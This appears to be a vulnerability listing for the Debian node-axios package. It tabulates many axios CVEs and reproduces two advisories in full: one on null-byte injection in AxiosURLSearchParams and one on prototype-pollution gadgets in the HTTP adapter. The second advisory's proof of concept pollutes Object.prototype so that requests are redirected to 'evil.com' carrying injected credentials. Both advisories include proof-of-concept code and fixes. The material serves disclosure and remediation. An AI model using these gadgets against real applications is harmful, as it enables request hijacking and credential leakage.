| purl | pkg:deb/debian/node-axios@1.16.0-1 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
| This package is not known to be affected by vulnerabilities. | | |
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-37kj-pzyt-8be6 | Axios is Vulnerable to Denial of Service via `__proto__` Key in mergeConfig: The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service. | CVE-2026-25639, GHSA-43fc-jf86-j433 |
| VCID-4b7a-22xk-gbh9 | axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data | CVE-2026-42039, GHSA-62hf-57xw-28j9 |
| VCID-5kg1-k416-dfc1 | Axios: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams (full advisory text below the table) | CVE-2026-42040, GHSA-xhjh-pmcv-23jw |
| VCID-6ru1-uamj-5ud3 | axios: Axios: HTTP Transport Hijacking via Prototype Pollution | CVE-2026-42033, GHSA-pf86-5x62-jrwf |
| VCID-8a5f-cd5t-mucc | axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget | CVE-2026-42044, GHSA-3w6x-2g7m-8v23 |
| VCID-axy8-kmka-pugw | Axios is vulnerable to DoS attack through lack of data size check: When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`. | CVE-2025-58754, GHSA-4hjh-wcwx-xvwj |
| VCID-gp41-4j8d-37ce | axios: Axios: Information disclosure due to `no_proxy` bypass | CVE-2026-42038, GHSA-m7pr-hjqh-92cm |
| VCID-hadc-5d2f-gqe6 | axios: Node.js: Axios: Information disclosure via CRLF injection in multipart Content-Type header | CVE-2026-42037, GHSA-445q-vr5w-6q77 |
| VCID-jvs6-8bva-nqb3 | axios: Axios: Denial of Service via unbounded stream consumption when `responseType: 'stream'` is used | CVE-2026-42036, GHSA-vf2m-468p-8v99 |
| VCID-kwj2-mk8c-4fef | axios: Axios: Remote Code Execution via Prototype Pollution escalation | CVE-2026-40175, GHSA-fvcv-3m26-pcqx |
| VCID-nw25-3vx3-73bg | axios: Axios: Denial of Service via HTTP/2 session cleanup logic state corruption | CVE-2026-39865, GHSA-qj83-cq47-w5f8 |
| VCID-rusx-pwdw-zqcj | Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking (full advisory text below the table) | CVE-2026-42264, GHSA-q8qp-cvcw-x6jj |
| VCID-td7u-cct6-bud6 | axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization | CVE-2025-62718, GHSA-3p68-rc4w-qgx5 |
| VCID-vzqt-dj1z-bqa6 | axios: Axios: Arbitrary HTTP header injection via prototype pollution | CVE-2026-42035, GHSA-6chq-wfr3-2hj9 |
| VCID-xdas-dhtb-nuge | axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling | CVE-2026-42041, GHSA-w9j2-pvgh-6h63 |
| VCID-xg1x-4spz-jucn | axios: Axios: XSRF token bypass leading to information disclosure | CVE-2026-42042, GHSA-xx6v-rp6x-q39c |
| VCID-yu5y-e4bk-zyfp | axios: Axios: Denial of Service via oversized streamed uploads bypassing body limits | CVE-2026-42034, GHSA-5c9x-8gcm-mpgx |
| VCID-z5pf-pqcd-ckas | axios: Axios: NO_PROXY bypass via crafted URL | CVE-2026-42043, GHSA-pmwg-cvhr-8vh7 |

# VCID-5kg1-k416-dfc1: Vulnerability Disclosure: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams

Aliases: CVE-2026-42040, GHSA-xhjh-pmcv-23jw

## Summary

The `encode()` function in `lib/helpers/AxiosURLSearchParams.js` contains a character mapping (`charMap`) at line 21 that **reverses** the safe percent-encoding of null bytes. After `encodeURIComponent('\x00')` correctly produces the safe sequence `%00`, the charMap entry `'%00': '\x00'` converts it back to a raw null byte. This is a clear encoding defect: every other charMap entry encodes in the safe direction (literal → percent-encoded), while this single entry decodes in the opposite (dangerous) direction.

**Severity:** Low (CVSS 3.7)
**Affected Versions:** All versions containing this charMap entry
**Vulnerable Component:** `lib/helpers/AxiosURLSearchParams.js:21`

## CWE

- **CWE-626:** Null Byte Interaction Error (Poison Null Byte)
- **CWE-116:** Improper Encoding or Escaping of Output

## CVSS 3.1

**Score: 3.7 (Low)**

Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N`

| Metric | Value | Justification |
|---|---|---|
| Attack Vector | Network | Attacker controls input parameters remotely |
| Attack Complexity | High | Standard axios request flow (`buildURL`) uses its own `encode` function which does NOT have this bug. Only triggered via direct `AxiosURLSearchParams.toString()` without an encoder, or via custom `paramsSerializer` delegation |
| Privileges Required | None | No authentication needed |
| User Interaction | None | No user interaction required |
| Scope | Unchanged | Impact limited to HTTP request URL |
| Confidentiality | None | No confidentiality impact |
| Integrity | Low | Null byte in URL can cause truncation in C-based backends, but requires a vulnerable downstream parser |
| Availability | None | No availability impact |

## Vulnerable Code

**File:** `lib/helpers/AxiosURLSearchParams.js`, lines 13-26

```javascript
function encode(str) {
  const charMap = {
    '!': '%21',    // literal → encoded (SAFE direction)
    "'": '%27',    // literal → encoded (SAFE direction)
    '(': '%28',    // literal → encoded (SAFE direction)
    ')': '%29',    // literal → encoded (SAFE direction)
    '~': '%7E',    // literal → encoded (SAFE direction)
    '%20': '+',    // standard transformation (SAFE)
    '%00': '\x00', // LINE 21: encoded → raw null byte (UNSAFE direction!)
  };
  return encodeURIComponent(str).replace(/[!'()~]|%20|%00/g, function replacer(match) {
    return charMap[match];
  });
}
```

### Why the Standard Flow Is NOT Affected

```javascript
// buildURL.js:36 — uses its OWN encode function (lines 14-20), not AxiosURLSearchParams's
const _encode = (options && options.encode) || encode; // buildURL's encode

// buildURL.js:53 — passes buildURL's encode to AxiosURLSearchParams
new AxiosURLSearchParams(params, _options).toString(_encode); // external encoder used

// AxiosURLSearchParams.js:48 — when encoder is provided, internal encode is NOT used
const _encode = encoder ? function(value) {
  return encoder.call(this, value, encode);
} : encode;
//                                       ^^^^^^
// internal encode passed as 2nd arg but only used if
// the external encoder explicitly delegates to it
```

## Proof of Concept

```javascript
import AxiosURLSearchParams from './lib/helpers/AxiosURLSearchParams.js';
import buildURL from './lib/helpers/buildURL.js';

// Test 1: Direct AxiosURLSearchParams (VULNERABLE path)
const params = new AxiosURLSearchParams({ file: 'test\x00.txt' });
const result = params.toString(); // NO encoder → uses internal encode with charMap
console.log('Direct toString():', JSON.stringify(result));
// Output: "file=test\u0000.txt" (contains raw null byte)
console.log('Hex:', Buffer.from(result).toString('hex'));
// Output: 66696c653d74657374002e747874 (00 = null byte)

// Test 2: Via buildURL (NOT vulnerable — standard axios flow)
const url = buildURL('http://example.com/api', { file: 'test\x00.txt' });
console.log('Via buildURL:', url);
// Output: http://example.com/api?file=test%00.txt (%00 preserved safely)
```

## Verified PoC Output

```
Direct toString(): "file=test\u0000.txt"
Contains raw null byte: true
Hex: 66696c653d74657374002e747874
Via buildURL: http://example.com/api?file=test%00.txt
Contains raw null byte: false
Contains safe %00: true
```

## Impact Analysis

**Primary impact is limited** because the standard axios request flow is not affected. However:

- **Direct API users:** Applications using `AxiosURLSearchParams` directly for custom serialization are affected
- **Custom paramsSerializer:** A `paramsSerializer.encode` that delegates to the internal encoder triggers the bug
- **Code defect signal:** The directional inconsistency in charMap is a clear coding error with no legitimate use case

If null bytes reach a downstream C-based parser, impacts include URL truncation, WAF bypass, and log injection.

## Recommended Fix

Remove the `%00` entry from charMap and update the regex:

```javascript
function encode(str) {
  const charMap = {
    '!': '%21',
    "'": '%27',
    '(': '%28',
    ')': '%29',
    '~': '%7E',
    '%20': '+',
    // REMOVED: '%00': '\x00'
  };
  return encodeURIComponent(str).replace(/[!'()~]|%20/g, function replacer(match) {
    //                                              ^^^^ removed |%00
    return charMap[match];
  });
}
```

## Resources

- [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html)
- [CWE-116: Improper Encoding or Escaping of Output](https://cwe.mitre.org/data/definitions/116.html)
- [OWASP: Embedding Null Code](https://owasp.org/www-community/attacks/Embedding_Null_Code)
- [Axios GitHub Repository](https://github.com/axios/axios)

## Timeline

| Date | Event |
|---|---|
| 2026-04-15 | Vulnerability discovered during source code audit |
| 2026-04-16 | Report revised: documented standard-flow limitation, corrected CVSS |
| TBD | Report submitted to vendor via GitHub Security Advisory |

# VCID-rusx-pwdw-zqcj: Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking

Aliases: CVE-2026-42264, GHSA-q8qp-cvcw-x6jj

## Summary

Five config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.

## Affected Properties

1. **`config.auth`** (`lib/adapters/http.js` line 617): Injects attacker-controlled `Authorization` header on all requests.
2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18): Redirects all requests using relative URLs to an attacker-controlled server.
3. **`config.socketPath`** (`lib/adapters/http.js` line 669): Redirects requests to internal Unix sockets (e.g. Docker daemon).
4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698): Executes attacker-supplied callback during HTTP redirects.
5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712): Enables Node.js insecure HTTP parser on all requests.

## Proof of Concept

```javascript
const axios = require('axios');

// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';

await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials
```

## Impact

- **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers.
- **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server.
- **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
- **Code execution:** Attacker-supplied functions execute during HTTP redirects.
- **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling.

## Root Cause

`mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values.

The `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection.

## Suggested Fix

Apply the existing `own()` helper to all affected properties:

```javascript
const configAuth = own('auth');
if (configAuth) {
  const username = configAuth.username || '';
  const password = configAuth.password || '';
  auth = username + ':' + password;
}
```

Same pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.
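For the read-side gadget advisory (VCID-rusx-pwdw-zqcj), an added example that is not axios code: it contrasts an unguarded config read with the own-property guard the advisory recommends, under a constructed pollution of `Object.prototype`. `readUnguarded`, `readOwn`, `buildRequest` and `demo` are hypothetical helper names, and the polluted host and credential values are constructed.

```javascript
// Added example, not axios code: models the read-side gadget (unguarded
// `config.auth` / `config.baseURL` reads) next to the own-property guard that
// closes it. All helper names are hypothetical; the pollution is constructed.

// Unguarded read: `config[key]` walks the prototype chain, so a polluted
// Object.prototype supplies a value the caller never set.
function readUnguarded(config, key) {
  return config[key];
}

// Guarded read (the advisory's `own()` pattern): only an own property counts,
// so inherited values from a polluted prototype are ignored.
function readOwn(config, key) {
  return Object.prototype.hasOwnProperty.call(config, key) ? config[key] : undefined;
}

// Simplified model of the adapter: derive the Authorization header and the
// target URL from config using the supplied reader.
function buildRequest(config, read) {
  const headers = {};
  const auth = read(config, 'auth');
  if (auth) {
    const cred = (auth.username || '') + ':' + (auth.password || '');
    headers.Authorization = 'Basic ' + Buffer.from(cred).toString('base64');
  }
  const baseURL = read(config, 'baseURL');
  const isAbsolute = /^https?:\/\//i.test(config.url);
  const url = baseURL && !isAbsolute
    ? baseURL.replace(/\/+$/, '') + '/' + config.url.replace(/^\/+/, '')
    : config.url;
  return { url, headers, socketPath: read(config, 'socketPath') };
}

// Run both readers under a constructed pollution of Object.prototype, then
// remove it so nothing else in the process observes it.
function demo() {
  Object.prototype.auth = { username: 'polluted', password: 'x' };
  Object.prototype.baseURL = 'https://polluted.invalid';
  try {
    const config = { url: '/api/users' }; // caller never set auth or baseURL
    return {
      unguarded: buildRequest(config, readUnguarded),
      guarded: buildRequest(config, readOwn),
    };
  } finally {
    delete Object.prototype.auth;
    delete Object.prototype.baseURL;
  }
}
```

With the unguarded reader the relative request is rewritten to the polluted host and carries a Basic credential the caller never configured; with the guarded reader both fields stay unset.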